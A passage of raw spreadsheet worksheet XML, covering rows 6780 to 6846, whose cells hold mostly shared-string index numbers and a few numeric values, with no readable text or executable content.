      <c r="A6780" t="s">
        <v>10021</v>
      </c>
      <c r="B6780">
        <v>3611</v>
      </c>
      <c r="C6780" t="s">
        <v>1348</v>
      </c>
      <c r="D6780" t="s">
        <v>10022</v>
      </c>
      <c r="E6780" t="s">
        <v>10023</v>
      </c>
      <c r="F6780" t="s">
        <v>10023</v>
      </c>
      <c r="G6780" t="s">
        <v>3656</v>
      </c>
    </row>
    <row r="6781" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6781" t="s">
        <v>10024</v>
      </c>
      <c r="B6781">
        <v>3612</v>
      </c>
      <c r="C6781" t="s">
        <v>1345</v>
      </c>
      <c r="D6781" t="s">
        <v>10025</v>
      </c>
      <c r="E6781" t="s">
        <v>10026</v>
      </c>
      <c r="F6781" t="s">
        <v>10027</v>
      </c>
      <c r="G6781" t="s">
        <v>3656</v>
      </c>
      <c r="H6781">
        <v>43738</v>
      </c>
    </row>
    <row r="6782" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6782" t="s">
        <v>10024</v>
      </c>
      <c r="B6782">
        <v>3612</v>
      </c>
      <c r="C6782" t="s">
        <v>1348</v>
      </c>
      <c r="D6782" t="s">
        <v>10025</v>
      </c>
      <c r="E6782" t="s">
        <v>10026</v>
      </c>
      <c r="F6782" t="s">
        <v>10027</v>
      </c>
      <c r="G6782" t="s">
        <v>3656</v>
      </c>
      <c r="H6782">
        <v>43738</v>
      </c>
    </row>
    <row r="6783" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6783" t="s">
        <v>10028</v>
      </c>
      <c r="B6783">
        <v>3613</v>
      </c>
      <c r="C6783" t="s">
        <v>1345</v>
      </c>
      <c r="D6783" t="s">
        <v>10029</v>
      </c>
      <c r="E6783" t="s">
        <v>10030</v>
      </c>
      <c r="F6783" t="s">
        <v>10030</v>
      </c>
      <c r="G6783" t="s">
        <v>6413</v>
      </c>
    </row>
    <row r="6784" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6784" t="s">
        <v>10028</v>
      </c>
      <c r="B6784">
        <v>3613</v>
      </c>
      <c r="C6784" t="s">
        <v>1348</v>
      </c>
      <c r="D6784" t="s">
        <v>10029</v>
      </c>
      <c r="E6784" t="s">
        <v>10030</v>
      </c>
      <c r="F6784" t="s">
        <v>10030</v>
      </c>
      <c r="G6784" t="s">
        <v>6413</v>
      </c>
    </row>
    <row r="6785" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A6785" t="s">
        <v>10031</v>
      </c>
      <c r="B6785">
        <v>3614</v>
      </c>
      <c r="C6785" t="s">
        <v>1345</v>
      </c>
      <c r="D6785" t="s">
        <v>10032</v>
      </c>
      <c r="E6785" t="s">
        <v>10033</v>
      </c>
      <c r="F6785" t="s">
        <v>10033</v>
      </c>
      <c r="G6785">
        <v>40700</v>
      </c>
    </row>
    <row r="6786" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A6786" t="s">
        <v>10031</v>
      </c>
      <c r="B6786">
        <v>3614</v>
      </c>
      <c r="C6786" t="s">
        <v>1348</v>
      </c>
      <c r="D6786" t="s">
        <v>10032</v>
      </c>
      <c r="E6786" t="s">
        <v>10033</v>
      </c>
      <c r="F6786" t="s">
        <v>10033</v>
      </c>
      <c r="G6786">
        <v>40700</v>
      </c>
    </row>
    <row r="6787" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A6787" t="s">
        <v>10034</v>
      </c>
      <c r="B6787">
        <v>3615</v>
      </c>
      <c r="C6787" t="s">
        <v>1345</v>
      </c>
      <c r="D6787" t="s">
        <v>10035</v>
      </c>
      <c r="E6787" t="s">
        <v>10036</v>
      </c>
      <c r="F6787" t="s">
        <v>10036</v>
      </c>
      <c r="G6787" t="s">
        <v>5909</v>
      </c>
    </row>
    <row r="6788" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A6788" t="s">
        <v>10034</v>
      </c>
      <c r="B6788">
        <v>3615</v>
      </c>
      <c r="C6788" t="s">
        <v>1348</v>
      </c>
      <c r="D6788" t="s">
        <v>10035</v>
      </c>
      <c r="E6788" t="s">
        <v>10036</v>
      </c>
      <c r="F6788" t="s">
        <v>10036</v>
      </c>
      <c r="G6788" t="s">
        <v>5909</v>
      </c>
    </row>
    <row r="6789" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A6789" t="s">
        <v>10037</v>
      </c>
      <c r="B6789">
        <v>3616</v>
      </c>
      <c r="C6789" t="s">
        <v>1345</v>
      </c>
      <c r="D6789" t="s">
        <v>10038</v>
      </c>
      <c r="E6789" t="s">
        <v>10039</v>
      </c>
      <c r="F6789" t="s">
        <v>10039</v>
      </c>
      <c r="G6789" t="s">
        <v>5909</v>
      </c>
    </row>
    <row r="6790" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A6790" t="s">
        <v>10037</v>
      </c>
      <c r="B6790">
        <v>3616</v>
      </c>
      <c r="C6790" t="s">
        <v>1348</v>
      </c>
      <c r="D6790" t="s">
        <v>10038</v>
      </c>
      <c r="E6790" t="s">
        <v>10039</v>
      </c>
      <c r="F6790" t="s">
        <v>10039</v>
      </c>
      <c r="G6790" t="s">
        <v>5909</v>
      </c>
    </row>
    <row r="6791" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A6791" t="s">
        <v>10040</v>
      </c>
      <c r="B6791">
        <v>3617</v>
      </c>
      <c r="C6791" t="s">
        <v>1345</v>
      </c>
      <c r="D6791" t="s">
        <v>10041</v>
      </c>
      <c r="E6791" t="s">
        <v>10042</v>
      </c>
      <c r="F6791" t="s">
        <v>10042</v>
      </c>
    </row>
    <row r="6792" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A6792" t="s">
        <v>10040</v>
      </c>
      <c r="B6792">
        <v>3617</v>
      </c>
      <c r="C6792" t="s">
        <v>1348</v>
      </c>
      <c r="D6792" t="s">
        <v>10041</v>
      </c>
      <c r="E6792" t="s">
        <v>10042</v>
      </c>
      <c r="F6792" t="s">
        <v>10042</v>
      </c>
    </row>
    <row r="6793" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A6793" t="s">
        <v>10043</v>
      </c>
      <c r="B6793">
        <v>3618</v>
      </c>
      <c r="C6793" t="s">
        <v>1345</v>
      </c>
      <c r="D6793" t="s">
        <v>10044</v>
      </c>
    </row>
    <row r="6794" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A6794" t="s">
        <v>10043</v>
      </c>
      <c r="B6794">
        <v>3618</v>
      </c>
      <c r="C6794" t="s">
        <v>1348</v>
      </c>
      <c r="D6794" t="s">
        <v>10044</v>
      </c>
    </row>
    <row r="6795" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A6795" t="s">
        <v>10045</v>
      </c>
      <c r="B6795">
        <v>3619</v>
      </c>
      <c r="C6795" t="s">
        <v>1345</v>
      </c>
      <c r="D6795" t="s">
        <v>10046</v>
      </c>
      <c r="E6795" t="s">
        <v>10047</v>
      </c>
      <c r="F6795" t="s">
        <v>10047</v>
      </c>
      <c r="G6795" t="s">
        <v>5909</v>
      </c>
    </row>
    <row r="6796" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A6796" t="s">
        <v>10045</v>
      </c>
      <c r="B6796">
        <v>3619</v>
      </c>
      <c r="C6796" t="s">
        <v>1348</v>
      </c>
      <c r="D6796" t="s">
        <v>10046</v>
      </c>
      <c r="E6796" t="s">
        <v>10047</v>
      </c>
      <c r="F6796" t="s">
        <v>10047</v>
      </c>
      <c r="G6796" t="s">
        <v>5909</v>
      </c>
    </row>
    <row r="6797" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A6797" t="s">
        <v>10048</v>
      </c>
      <c r="B6797">
        <v>3620</v>
      </c>
      <c r="C6797" t="s">
        <v>1345</v>
      </c>
      <c r="D6797" t="s">
        <v>10049</v>
      </c>
    </row>
    <row r="6798" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A6798" t="s">
        <v>10048</v>
      </c>
      <c r="B6798">
        <v>3620</v>
      </c>
      <c r="C6798" t="s">
        <v>1348</v>
      </c>
      <c r="D6798" t="s">
        <v>10049</v>
      </c>
    </row>
    <row r="6799" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A6799" t="s">
        <v>10050</v>
      </c>
      <c r="B6799">
        <v>3621</v>
      </c>
      <c r="C6799" t="s">
        <v>1345</v>
      </c>
      <c r="D6799" t="s">
        <v>10051</v>
      </c>
      <c r="E6799" t="s">
        <v>10052</v>
      </c>
      <c r="F6799" t="s">
        <v>10052</v>
      </c>
      <c r="G6799" t="s">
        <v>5909</v>
      </c>
    </row>
    <row r="6800" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A6800" t="s">
        <v>10050</v>
      </c>
      <c r="B6800">
        <v>3621</v>
      </c>
      <c r="C6800" t="s">
        <v>1348</v>
      </c>
      <c r="D6800" t="s">
        <v>10051</v>
      </c>
      <c r="E6800" t="s">
        <v>10052</v>
      </c>
      <c r="F6800" t="s">
        <v>10052</v>
      </c>
      <c r="G6800" t="s">
        <v>5909</v>
      </c>
    </row>
    <row r="6801" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A6801" t="s">
        <v>10053</v>
      </c>
      <c r="B6801">
        <v>3622</v>
      </c>
      <c r="C6801" t="s">
        <v>1345</v>
      </c>
      <c r="D6801" t="s">
        <v>10054</v>
      </c>
      <c r="E6801" t="s">
        <v>3428</v>
      </c>
      <c r="F6801" t="s">
        <v>3428</v>
      </c>
      <c r="G6801" t="s">
        <v>5909</v>
      </c>
    </row>
    <row r="6802" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A6802" t="s">
        <v>10053</v>
      </c>
      <c r="B6802">
        <v>3622</v>
      </c>
      <c r="C6802" t="s">
        <v>1348</v>
      </c>
      <c r="D6802" t="s">
        <v>10054</v>
      </c>
      <c r="E6802" t="s">
        <v>3428</v>
      </c>
      <c r="F6802" t="s">
        <v>3428</v>
      </c>
      <c r="G6802" t="s">
        <v>5909</v>
      </c>
    </row>
    <row r="6803" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A6803" t="s">
        <v>10055</v>
      </c>
      <c r="B6803">
        <v>3623</v>
      </c>
      <c r="C6803" t="s">
        <v>1345</v>
      </c>
      <c r="D6803" t="s">
        <v>10056</v>
      </c>
      <c r="E6803" t="s">
        <v>10057</v>
      </c>
      <c r="F6803" t="s">
        <v>10057</v>
      </c>
      <c r="G6803" t="s">
        <v>5909</v>
      </c>
    </row>
    <row r="6804" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A6804" t="s">
        <v>10055</v>
      </c>
      <c r="B6804">
        <v>3623</v>
      </c>
      <c r="C6804" t="s">
        <v>1348</v>
      </c>
      <c r="D6804" t="s">
        <v>10056</v>
      </c>
      <c r="E6804" t="s">
        <v>10057</v>
      </c>
      <c r="F6804" t="s">
        <v>10057</v>
      </c>
      <c r="G6804" t="s">
        <v>5909</v>
      </c>
    </row>
    <row r="6805" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A6805" t="s">
        <v>10058</v>
      </c>
      <c r="B6805">
        <v>3624</v>
      </c>
      <c r="C6805" t="s">
        <v>1345</v>
      </c>
      <c r="D6805" t="s">
        <v>10059</v>
      </c>
      <c r="E6805" t="s">
        <v>10060</v>
      </c>
      <c r="F6805" t="s">
        <v>10060</v>
      </c>
      <c r="G6805" t="s">
        <v>5909</v>
      </c>
    </row>
    <row r="6806" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A6806" t="s">
        <v>10058</v>
      </c>
      <c r="B6806">
        <v>3624</v>
      </c>
      <c r="C6806" t="s">
        <v>1348</v>
      </c>
      <c r="D6806" t="s">
        <v>10059</v>
      </c>
      <c r="E6806" t="s">
        <v>10060</v>
      </c>
      <c r="F6806" t="s">
        <v>10060</v>
      </c>
      <c r="G6806" t="s">
        <v>5909</v>
      </c>
    </row>
    <row r="6807" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A6807" t="s">
        <v>10061</v>
      </c>
      <c r="B6807">
        <v>3625</v>
      </c>
      <c r="C6807" t="s">
        <v>1345</v>
      </c>
      <c r="D6807" t="s">
        <v>10062</v>
      </c>
      <c r="E6807" t="s">
        <v>10063</v>
      </c>
      <c r="F6807" t="s">
        <v>10063</v>
      </c>
      <c r="G6807" t="s">
        <v>5909</v>
      </c>
    </row>
    <row r="6808" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A6808" t="s">
        <v>10061</v>
      </c>
      <c r="B6808">
        <v>3625</v>
      </c>
      <c r="C6808" t="s">
        <v>1348</v>
      </c>
      <c r="D6808" t="s">
        <v>10062</v>
      </c>
      <c r="E6808" t="s">
        <v>10063</v>
      </c>
      <c r="F6808" t="s">
        <v>10063</v>
      </c>
      <c r="G6808" t="s">
        <v>5909</v>
      </c>
    </row>
    <row r="6809" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A6809" t="s">
        <v>10064</v>
      </c>
      <c r="B6809">
        <v>3626</v>
      </c>
      <c r="C6809" t="s">
        <v>1345</v>
      </c>
      <c r="D6809" t="s">
        <v>10065</v>
      </c>
      <c r="E6809" t="s">
        <v>10066</v>
      </c>
      <c r="F6809" t="s">
        <v>10066</v>
      </c>
      <c r="G6809" t="s">
        <v>5909</v>
      </c>
    </row>
    <row r="6810" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A6810" t="s">
        <v>10064</v>
      </c>
      <c r="B6810">
        <v>3626</v>
      </c>
      <c r="C6810" t="s">
        <v>1348</v>
      </c>
      <c r="D6810" t="s">
        <v>10065</v>
      </c>
      <c r="E6810" t="s">
        <v>10066</v>
      </c>
      <c r="F6810" t="s">
        <v>10066</v>
      </c>
      <c r="G6810" t="s">
        <v>5909</v>
      </c>
    </row>
    <row r="6811" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A6811" t="s">
        <v>10067</v>
      </c>
      <c r="B6811">
        <v>3627</v>
      </c>
      <c r="C6811" t="s">
        <v>1345</v>
      </c>
      <c r="D6811" t="s">
        <v>10068</v>
      </c>
      <c r="E6811" t="s">
        <v>10069</v>
      </c>
      <c r="F6811" t="s">
        <v>10069</v>
      </c>
      <c r="G6811" t="s">
        <v>5909</v>
      </c>
    </row>
    <row r="6812" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A6812" t="s">
        <v>10067</v>
      </c>
      <c r="B6812">
        <v>3627</v>
      </c>
      <c r="C6812" t="s">
        <v>1348</v>
      </c>
      <c r="D6812" t="s">
        <v>10068</v>
      </c>
      <c r="E6812" t="s">
        <v>10069</v>
      </c>
      <c r="F6812" t="s">
        <v>10069</v>
      </c>
      <c r="G6812" t="s">
        <v>5909</v>
      </c>
    </row>
    <row r="6813" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A6813" t="s">
        <v>10070</v>
      </c>
      <c r="B6813">
        <v>3628</v>
      </c>
      <c r="C6813" t="s">
        <v>1345</v>
      </c>
      <c r="D6813" t="s">
        <v>10071</v>
      </c>
      <c r="E6813" t="s">
        <v>10072</v>
      </c>
      <c r="F6813" t="s">
        <v>10072</v>
      </c>
      <c r="G6813" t="s">
        <v>5909</v>
      </c>
    </row>
    <row r="6814" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A6814" t="s">
        <v>10070</v>
      </c>
      <c r="B6814">
        <v>3628</v>
      </c>
      <c r="C6814" t="s">
        <v>1348</v>
      </c>
      <c r="D6814" t="s">
        <v>10071</v>
      </c>
      <c r="E6814" t="s">
        <v>10072</v>
      </c>
      <c r="F6814" t="s">
        <v>10072</v>
      </c>
      <c r="G6814" t="s">
        <v>5909</v>
      </c>
    </row>
    <row r="6815" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A6815" t="s">
        <v>10073</v>
      </c>
      <c r="B6815">
        <v>3629</v>
      </c>
      <c r="C6815" t="s">
        <v>1345</v>
      </c>
      <c r="D6815" t="s">
        <v>10074</v>
      </c>
      <c r="E6815" t="s">
        <v>10075</v>
      </c>
      <c r="F6815" t="s">
        <v>10075</v>
      </c>
      <c r="G6815" t="s">
        <v>5909</v>
      </c>
    </row>
    <row r="6816" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A6816" t="s">
        <v>10073</v>
      </c>
      <c r="B6816">
        <v>3629</v>
      </c>
      <c r="C6816" t="s">
        <v>1348</v>
      </c>
      <c r="D6816" t="s">
        <v>10074</v>
      </c>
      <c r="E6816" t="s">
        <v>10075</v>
      </c>
      <c r="F6816" t="s">
        <v>10075</v>
      </c>
      <c r="G6816" t="s">
        <v>5909</v>
      </c>
    </row>
    <row r="6817" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A6817" t="s">
        <v>10076</v>
      </c>
      <c r="B6817">
        <v>3630</v>
      </c>
      <c r="C6817" t="s">
        <v>1345</v>
      </c>
      <c r="D6817" t="s">
        <v>10077</v>
      </c>
    </row>
    <row r="6818" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A6818" t="s">
        <v>10076</v>
      </c>
      <c r="B6818">
        <v>3630</v>
      </c>
      <c r="C6818" t="s">
        <v>1348</v>
      </c>
      <c r="D6818" t="s">
        <v>10077</v>
      </c>
    </row>
    <row r="6819" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A6819" t="s">
        <v>10078</v>
      </c>
      <c r="B6819">
        <v>3631</v>
      </c>
      <c r="C6819" t="s">
        <v>1345</v>
      </c>
      <c r="D6819" t="s">
        <v>10079</v>
      </c>
      <c r="E6819" t="s">
        <v>10080</v>
      </c>
      <c r="F6819" t="s">
        <v>10080</v>
      </c>
      <c r="G6819" t="s">
        <v>5909</v>
      </c>
    </row>
    <row r="6820" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A6820" t="s">
        <v>10078</v>
      </c>
      <c r="B6820">
        <v>3631</v>
      </c>
      <c r="C6820" t="s">
        <v>1348</v>
      </c>
      <c r="D6820" t="s">
        <v>10079</v>
      </c>
      <c r="E6820" t="s">
        <v>10080</v>
      </c>
      <c r="F6820" t="s">
        <v>10080</v>
      </c>
      <c r="G6820" t="s">
        <v>5909</v>
      </c>
    </row>
    <row r="6821" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A6821" t="s">
        <v>10081</v>
      </c>
      <c r="B6821">
        <v>3632</v>
      </c>
      <c r="C6821" t="s">
        <v>1345</v>
      </c>
      <c r="D6821" t="s">
        <v>10082</v>
      </c>
      <c r="E6821" t="s">
        <v>10083</v>
      </c>
      <c r="F6821" t="s">
        <v>10083</v>
      </c>
      <c r="G6821" t="s">
        <v>10084</v>
      </c>
      <c r="L6821" t="s">
        <v>1485</v>
      </c>
    </row>
    <row r="6822" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A6822" t="s">
        <v>10081</v>
      </c>
      <c r="B6822">
        <v>3632</v>
      </c>
      <c r="C6822" t="s">
        <v>1348</v>
      </c>
      <c r="D6822" t="s">
        <v>10082</v>
      </c>
      <c r="E6822" t="s">
        <v>10083</v>
      </c>
      <c r="F6822" t="s">
        <v>10083</v>
      </c>
      <c r="G6822" t="s">
        <v>10084</v>
      </c>
      <c r="L6822" t="s">
        <v>1485</v>
      </c>
    </row>
    <row r="6823" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A6823" t="s">
        <v>10085</v>
      </c>
      <c r="B6823">
        <v>3633</v>
      </c>
      <c r="C6823" t="s">
        <v>1345</v>
      </c>
      <c r="D6823" t="s">
        <v>10086</v>
      </c>
      <c r="E6823" t="s">
        <v>10087</v>
      </c>
      <c r="F6823" t="s">
        <v>10087</v>
      </c>
      <c r="G6823" t="s">
        <v>10084</v>
      </c>
    </row>
    <row r="6824" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A6824" t="s">
        <v>10085</v>
      </c>
      <c r="B6824">
        <v>3633</v>
      </c>
      <c r="C6824" t="s">
        <v>1348</v>
      </c>
      <c r="D6824" t="s">
        <v>10086</v>
      </c>
      <c r="E6824" t="s">
        <v>10087</v>
      </c>
      <c r="F6824" t="s">
        <v>10087</v>
      </c>
      <c r="G6824" t="s">
        <v>10084</v>
      </c>
    </row>
    <row r="6825" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A6825" t="s">
        <v>10088</v>
      </c>
      <c r="B6825">
        <v>3634</v>
      </c>
      <c r="C6825" t="s">
        <v>1345</v>
      </c>
      <c r="D6825" t="s">
        <v>10089</v>
      </c>
      <c r="E6825" t="s">
        <v>10090</v>
      </c>
      <c r="F6825" t="s">
        <v>10090</v>
      </c>
      <c r="G6825" t="s">
        <v>10084</v>
      </c>
    </row>
    <row r="6826" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A6826" t="s">
        <v>10088</v>
      </c>
      <c r="B6826">
        <v>3634</v>
      </c>
      <c r="C6826" t="s">
        <v>1348</v>
      </c>
      <c r="D6826" t="s">
        <v>10089</v>
      </c>
      <c r="E6826" t="s">
        <v>10090</v>
      </c>
      <c r="F6826" t="s">
        <v>10090</v>
      </c>
      <c r="G6826" t="s">
        <v>10084</v>
      </c>
    </row>
    <row r="6827" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A6827" t="s">
        <v>10091</v>
      </c>
      <c r="B6827">
        <v>3635</v>
      </c>
      <c r="C6827" t="s">
        <v>1345</v>
      </c>
      <c r="D6827" t="s">
        <v>10092</v>
      </c>
      <c r="E6827" t="s">
        <v>10093</v>
      </c>
      <c r="F6827" t="s">
        <v>10093</v>
      </c>
      <c r="G6827" t="s">
        <v>10084</v>
      </c>
    </row>
    <row r="6828" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A6828" t="s">
        <v>10091</v>
      </c>
      <c r="B6828">
        <v>3635</v>
      </c>
      <c r="C6828" t="s">
        <v>1348</v>
      </c>
      <c r="D6828" t="s">
        <v>10092</v>
      </c>
      <c r="E6828" t="s">
        <v>10093</v>
      </c>
      <c r="F6828" t="s">
        <v>10093</v>
      </c>
      <c r="G6828" t="s">
        <v>10084</v>
      </c>
    </row>
    <row r="6829" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A6829" t="s">
        <v>10094</v>
      </c>
      <c r="B6829">
        <v>3636</v>
      </c>
      <c r="C6829" t="s">
        <v>1345</v>
      </c>
      <c r="D6829" t="s">
        <v>10095</v>
      </c>
      <c r="E6829" t="s">
        <v>10096</v>
      </c>
      <c r="F6829" t="s">
        <v>10096</v>
      </c>
      <c r="G6829" t="s">
        <v>10084</v>
      </c>
    </row>
    <row r="6830" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A6830" t="s">
        <v>10094</v>
      </c>
      <c r="B6830">
        <v>3636</v>
      </c>
      <c r="C6830" t="s">
        <v>1348</v>
      </c>
      <c r="D6830" t="s">
        <v>10095</v>
      </c>
      <c r="E6830" t="s">
        <v>10096</v>
      </c>
      <c r="F6830" t="s">
        <v>10096</v>
      </c>
      <c r="G6830" t="s">
        <v>10084</v>
      </c>
    </row>
    <row r="6831" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A6831" t="s">
        <v>10097</v>
      </c>
      <c r="B6831">
        <v>3637</v>
      </c>
      <c r="C6831" t="s">
        <v>1345</v>
      </c>
      <c r="D6831" t="s">
        <v>10098</v>
      </c>
      <c r="E6831" t="s">
        <v>10099</v>
      </c>
      <c r="F6831" t="s">
        <v>10099</v>
      </c>
      <c r="G6831" t="s">
        <v>10084</v>
      </c>
    </row>
    <row r="6832" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A6832" t="s">
        <v>10097</v>
      </c>
      <c r="B6832">
        <v>3637</v>
      </c>
      <c r="C6832" t="s">
        <v>1348</v>
      </c>
      <c r="D6832" t="s">
        <v>10098</v>
      </c>
      <c r="E6832" t="s">
        <v>10099</v>
      </c>
      <c r="F6832" t="s">
        <v>10099</v>
      </c>
      <c r="G6832" t="s">
        <v>10084</v>
      </c>
    </row>
    <row r="6833" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A6833" t="s">
        <v>10100</v>
      </c>
      <c r="B6833">
        <v>3638</v>
      </c>
      <c r="C6833" t="s">
        <v>1345</v>
      </c>
      <c r="D6833" t="s">
        <v>10101</v>
      </c>
      <c r="E6833" t="s">
        <v>10102</v>
      </c>
      <c r="F6833" t="s">
        <v>10102</v>
      </c>
      <c r="G6833" t="s">
        <v>10084</v>
      </c>
    </row>
    <row r="6834" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A6834" t="s">
        <v>10100</v>
      </c>
      <c r="B6834">
        <v>3638</v>
      </c>
      <c r="C6834" t="s">
        <v>1348</v>
      </c>
      <c r="D6834" t="s">
        <v>10101</v>
      </c>
      <c r="E6834" t="s">
        <v>10102</v>
      </c>
      <c r="F6834" t="s">
        <v>10102</v>
      </c>
      <c r="G6834" t="s">
        <v>10084</v>
      </c>
    </row>
    <row r="6835" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A6835" t="s">
        <v>10103</v>
      </c>
      <c r="B6835">
        <v>3639</v>
      </c>
      <c r="C6835" t="s">
        <v>1345</v>
      </c>
      <c r="D6835" t="s">
        <v>10104</v>
      </c>
      <c r="E6835" t="s">
        <v>10105</v>
      </c>
      <c r="F6835" t="s">
        <v>10105</v>
      </c>
      <c r="G6835" t="s">
        <v>10084</v>
      </c>
    </row>
    <row r="6836" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A6836" t="s">
        <v>10103</v>
      </c>
      <c r="B6836">
        <v>3639</v>
      </c>
      <c r="C6836" t="s">
        <v>1348</v>
      </c>
      <c r="D6836" t="s">
        <v>10104</v>
      </c>
      <c r="E6836" t="s">
        <v>10105</v>
      </c>
      <c r="F6836" t="s">
        <v>10105</v>
      </c>
      <c r="G6836" t="s">
        <v>10084</v>
      </c>
    </row>
    <row r="6837" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A6837" t="s">
        <v>10106</v>
      </c>
      <c r="B6837">
        <v>3640</v>
      </c>
      <c r="C6837" t="s">
        <v>1345</v>
      </c>
      <c r="D6837" t="s">
        <v>10107</v>
      </c>
    </row>
    <row r="6838" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A6838" t="s">
        <v>10106</v>
      </c>
      <c r="B6838">
        <v>3640</v>
      </c>
      <c r="C6838" t="s">
        <v>1348</v>
      </c>
      <c r="D6838" t="s">
        <v>10107</v>
      </c>
    </row>
    <row r="6839" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A6839" t="s">
        <v>10108</v>
      </c>
      <c r="B6839">
        <v>3641</v>
      </c>
      <c r="C6839" t="s">
        <v>1345</v>
      </c>
      <c r="D6839" t="s">
        <v>10109</v>
      </c>
      <c r="E6839" t="s">
        <v>10110</v>
      </c>
      <c r="F6839" t="s">
        <v>10110</v>
      </c>
      <c r="G6839" t="s">
        <v>10084</v>
      </c>
    </row>
    <row r="6840" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A6840" t="s">
        <v>10108</v>
      </c>
      <c r="B6840">
        <v>3641</v>
      </c>
      <c r="C6840" t="s">
        <v>1348</v>
      </c>
      <c r="D6840" t="s">
        <v>10109</v>
      </c>
      <c r="E6840" t="s">
        <v>10110</v>
      </c>
      <c r="F6840" t="s">
        <v>10110</v>
      </c>
      <c r="G6840" t="s">
        <v>10084</v>
      </c>
    </row>
    <row r="6841" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A6841" t="s">
        <v>10111</v>
      </c>
      <c r="B6841">
        <v>3642</v>
      </c>
      <c r="C6841" t="s">
        <v>1345</v>
      </c>
      <c r="D6841" t="s">
        <v>10112</v>
      </c>
      <c r="E6841" t="s">
        <v>10113</v>
      </c>
      <c r="F6841" t="s">
        <v>10113</v>
      </c>
      <c r="G6841" t="s">
        <v>10084</v>
      </c>
    </row>
    <row r="6842" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A6842" t="s">
        <v>10111</v>
      </c>
      <c r="B6842">
        <v>3642</v>
      </c>
      <c r="C6842" t="s">
        <v>1348</v>
      </c>
      <c r="D6842" t="s">
        <v>10112</v>
      </c>
      <c r="E6842" t="s">
        <v>10113</v>
      </c>
      <c r="F6842" t="s">
        <v>10113</v>
      </c>
      <c r="G6842" t="s">
        <v>10084</v>
      </c>
    </row>
    <row r="6843" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A6843" t="s">
        <v>10114</v>
      </c>
      <c r="B6843">
        <v>3643</v>
      </c>
      <c r="C6843" t="s">
        <v>1345</v>
      </c>
      <c r="D6843" t="s">
        <v>10115</v>
      </c>
      <c r="E6843" t="s">
        <v>10116</v>
      </c>
      <c r="F6843" t="s">
        <v>10116</v>
      </c>
      <c r="G6843" t="s">
        <v>10084</v>
      </c>
    </row>
    <row r="6844" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A6844" t="s">
        <v>10114</v>
      </c>
      <c r="B6844">
        <v>3643</v>
      </c>
      <c r="C6844" t="s">
        <v>1348</v>
      </c>
      <c r="D6844" t="s">
        <v>10115</v>
      </c>
      <c r="E6844" t="s">
        <v>10116</v>
      </c>
      <c r="F6844" t="s">
        <v>10116</v>
      </c>
      <c r="G6844" t="s">
        <v>10084</v>
      </c>
    </row>
    <row r="6845" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A6845" t="s">
        <v>10117</v>
      </c>
      <c r="B6845">
        <v>3644</v>
      </c>
      <c r="C6845" t="s">
        <v>1345</v>
      </c>
      <c r="D6845" t="s">
        <v>10117</v>
      </c>
      <c r="E6845" t="s">
        <v>5440</v>
      </c>
      <c r="F6845" t="s">
        <v>5440</v>
      </c>
      <c r="G6845" t="s">
        <v>10084</v>
      </c>
    </row>
    <row r="6846" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A6846" t="s">
        <v>10117</v>
      </c>
      <c r="B6846">
        <v>3644</v>
      </c>
      <c r="C6846" t="s">
        <v>1348</v>
      </c>
      <c r="D6846" t="s">
        <v>10117</v>
      </c>
      <c r="E6846" t="s">
        <v>5440</v>
      </c>
